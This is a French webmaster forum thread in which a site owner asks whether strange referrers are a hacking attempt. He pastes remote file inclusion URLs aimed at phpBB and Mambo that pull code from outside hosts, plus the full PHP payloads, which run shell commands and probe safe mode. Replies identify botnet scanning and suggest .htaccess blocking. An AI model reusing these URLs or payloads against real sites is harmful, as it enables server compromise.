Tentative de piratage ?

[Mountain Magazin]

Bonjour,

Depuis ce matin, j'ai des référents bizarres dans mes stats :
MONDOMAINE//?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dj4you.ch/vsd/test.txt???

le code du fichier :

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

Ou encore comme référent MON DOMAINE/?mosConfig_absolute_path=http://www.vfcuse.hu/test.txt?

Le code du fichier :

<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
	$contrs=0;
}
else{
	ini_restore("safe_mode");
	ini_restore("open_basedir");
	if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
		$contrs=0;
	}else{
		$contrs=1;
	}
}

if($contrs == 0){
	echo("SAFEMODEOFF");
}else{
	echo("SAFEMODEON");
}

function ex($cfe){
	$res = '';
	if (!empty($cfe)){
		if(function_exists('exec')){
			@exec($cfe,$res);
			$res = join("\n",$res);
		}
		elseif(function_exists('shell_exec')){
			$res = @shell_exec($cfe);
		}
		elseif(function_exists('system')){
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(function_exists('passthru')){
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(@is_resource($f = @popen($cfe,"r"))){
			$res = "";
			while(!@feof($f)) { $res .= @fread($f,1024); }
			@pclose($f);
		}
	}
	return $res;
}

exit(0);
 

Qu'en pensez vous ?

Tentative de piratage on dirait. Du sérieux ou pas ?

Merci

 

[Dan_A]

Pas de chance, ce sont des attaques de zombies à la recherche de failles connues de CMS, le but étant d'infecter le site pour ajouter de nouveaux zombies à un des nombreux botnets en activité.

 

[Mountain Magazin]

Ok, merci, ça me semblais pas catholique.

Existe-t-il un moyen de lutter ?

Merci de vos réponses.

 

[Leonick]

la 1° chose étant de bloquer les url contenant http:// dans le contenu du request_uri grâce au htaccess, après, selon le contenu de ton site, tu pourras bloquer les répertoires admin, ...

 

[Mountain Magazin]

Ok, mais comment tu fais ?

Je maîtrise bien l'URL rewriting, mais là je vois pas trop comment faire.

Merci